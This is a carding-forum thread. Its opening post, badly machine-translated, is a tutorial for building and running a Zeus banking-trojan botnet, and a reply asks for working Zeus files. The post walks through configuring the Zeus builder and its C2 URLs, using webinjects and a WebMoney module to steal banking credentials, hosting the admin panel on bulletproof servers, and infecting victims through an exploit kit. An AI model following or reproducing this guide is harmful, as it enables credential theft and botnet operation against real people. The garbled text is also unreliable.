PDA

View Full Version : Botnet Tutorial (Zeus) WITH IMAGE



CardingMafia Admin
03-28-2013, 09:58 AM
introduction

And so we need a bot builder, in this case Zeus bild 1.3.1.1

http://img690.imageshack.us/img690/7540/23525833.jpg

as you can see, we use the fake from "b1sh0p" which has been compiled
"Build time: 1917 23.08.2009 GMT" this information we can see in the menu "Information" menu, but we need a "Builder"

http://img12.imageshack.us/img12/3148/29595228.jpg

and so here we see to let Builder, and 3 buttons with which you wake up and we create our bot!!

let's think I will explain to you that what we have here:

1. server [php] 1277 - admin panel which is placed on the host ... m talk about it later.
2. cfg1.bin - is a backup configuration file highlighted that should be present for 2 (rezrvnom bulletproof server)
3. config.bin - our basic configuration that we will soon wake up to your own generit host.
4. config.txt - this is our Fail settings in which we wake to register all settings bot, and subsequently compiling build.
5. webinjects.txt - this is one of the most important Fail ... This zborka injected (roughly instuktsiya what fields and what lines to rob)
6. modul.exe - WebMoney is a module which steals Serta Keys well and connectedness with all the crap webmoney (Roux-en Closed srite where you live!)
7. zsb.exe - it is our builder with the aid of which we wake up and configure a bot!

http://img23.imageshack.us/img23/5977/33049709.jpg

So get started!!!
and so press the button "Edit Config" we see:


opened a Fail "config.txt" who need to edit to fit your needs.

Will tell in short, what we have here and how:
(get, we field Fail config.txt)

url_config "http://Tvoy_sayt/config.bin" - Fail to config which bots and get Old konektyatsya of change (for example, if you moved to another bulletproof server)
url_compip "http://Tvoy_sayt/cp.php" 1024 - This home page of our admin this picture we wake konekt and login to the admin panel.

url_loader "http://Tvoy_sayt/bot.exe" - is our bot need it here so that our boats were always relevant.
url_server "http://Tvoy_sayt/gate.php" - this is a script that takes the reports from our bots.


encryption_key "sys_admin" - is a key to decipher the fact that we sent our paper.

Well like all there is nothing more we do not need.

Fail close config.txt with saving. ....

While there is no button "Buil config" we do not click ... We need competent webinjects.txt you can write your own, or buy baryg forums!

it looks like this:

http://img707.imageshack.us/img707/2776/67251137.jpg

And so when we got competent webinjects.txt we can press a button "Buil config" and get the output:

http://img684.imageshack.us/img684/286/79887884.jpg

quite the one we want to "config.bin". Save it and move on ...

And then we have a button "Build loader" by clicking on it we get our bot that wakes tuned to our shayt and that wakes take settings from "config.bin" ... It looks like this:

http://img14.imageshack.us/img14/4144/46434731.jpg

and so we now have the virus and Fail for its valuable work ...
training we finished move on to the main part of our plan.

PS. Do not look at my dump files in the folder with the Zeus Builder ... I just so comfortable when everything is at hand))) all the files I mentioned above and gave a description of them ...


Setting the admin panel

Admin panel, we need to put on a bulletproof server to see if our bot slept hoster not demolished our admin and our records

Fail to our admin panel lie in my case in daddy "server [php] in 1277," and to be there:

http://img42.imageshack.us/img42/9550/61292988.jpg

and yes I want to add that this was to modify the admin panel for yourself ...
in the standard admin to Builder 1.3.1.1 nebylo faila s.php (but redir.php Fail indication that this is we do not go around Fail) as well in the directory \ system I added Fail fmt.php since Fail s.php is an indication on this file (Fail s.php and fmt.php I took out the old version of the admin panel) ... (Perhaps this modification was unnecessary but pochimu bots were sending me not to report until I added these files o_0)

So finding out what is in the admin panel we have to install it on our bulletproof server ... Bay of all the files on FTP (upload to be strictly by the link above that specified in the config.txt for example if you filled in the config http://Tvoy_sayt/AAAAAA/cp.php have http://Tvoy_sayt/AAAAA/config.bin then reports until you do not reach!! watch out), and so all the file into the bay server going on a link http://Tvoy_sayt/install/index.php prescribe all the data such as login and password to the admin panel and the data for the database konekt ... and also do not forget to specify the correct Encryption key: in this case sys_admin. Just put the flags on the Write reports to database and Write reports to local path. this will give us something that our reports will be stored in the base and in the Fail ...

So if everything was installed (and if everything was installed, you'll see it for yourself) when treatment needed to http://Tvoy_sayt/cp.php we see:


So enter the username and password of the instructions when installing the admin panel and voila you in admin panel ...!!


PS. FOLLOW correct spelling LINC! THIS IS THE KEY TO SUCCESS!!
ZYY. By the way Fail bot.exe config.bin and we also have to fill in for the server.


A bunch of ...

And so we gathered boat and set the admin panel ... the question is what do we do next .... And then we have our bot vparit kakomunibud woodpecker desirable in America or Europe to get a tasty linkvo)), and for this we use a bunch of exploits wake ... Wikipedia for this, I chose a bunch of normal menie called un-pack version 1.5 perelst looks this way:

http://img697.imageshack.us/img697/7974/82243543.jpg

as seen in the screenshot, I progruzil little traffic and even without peretyaski ligament it gives full of breaking o_0 myself was surprised when I test bundles but for beginners the most it!
And so here you are coming from love to confess so lazy and HELP is there a good ... idinstvenny trick that you need to find ftp proifreymit them ... I will tell about it in another article (in a review of the development of the creation of the Public ligaments Public ligaments of his sex privat ligaments and injection test traffic and crypts as an exe so most of the net (for the Wikipedia I shipped no encryption exe for a clearer dimonstratsii))

and so we see that the four progruzilos Unica in the admin panel, we see:

http://img697.imageshack.us/img697/3639/18672238.jpg

Well, what is the proguzilos and here they report for 10 days (until there was Yeshe 1k reports I have them removed as a bot zakosyachil teams and he burned it protroyanen and changed all the passwords ...)

Well, that seems to be all ... Oreyntirovana little article on novechkov and imeit couple stocks (specifically to create one you attended instead of sitting on all ready!!!!)


PS. Choose a bunch of rules and crypto EXE then all you get!!


Finally ...

And so today we rasmotreli how to build a botnet ... As you can see there is nothing there ... no complex BUT you will run into the undercurrents in which you have to understand yourself ...

All successful and well ekmperementov progruza!!

lolitosfb
04-01-2013, 04:31 PM
Hi,maybe you have zeus full working files.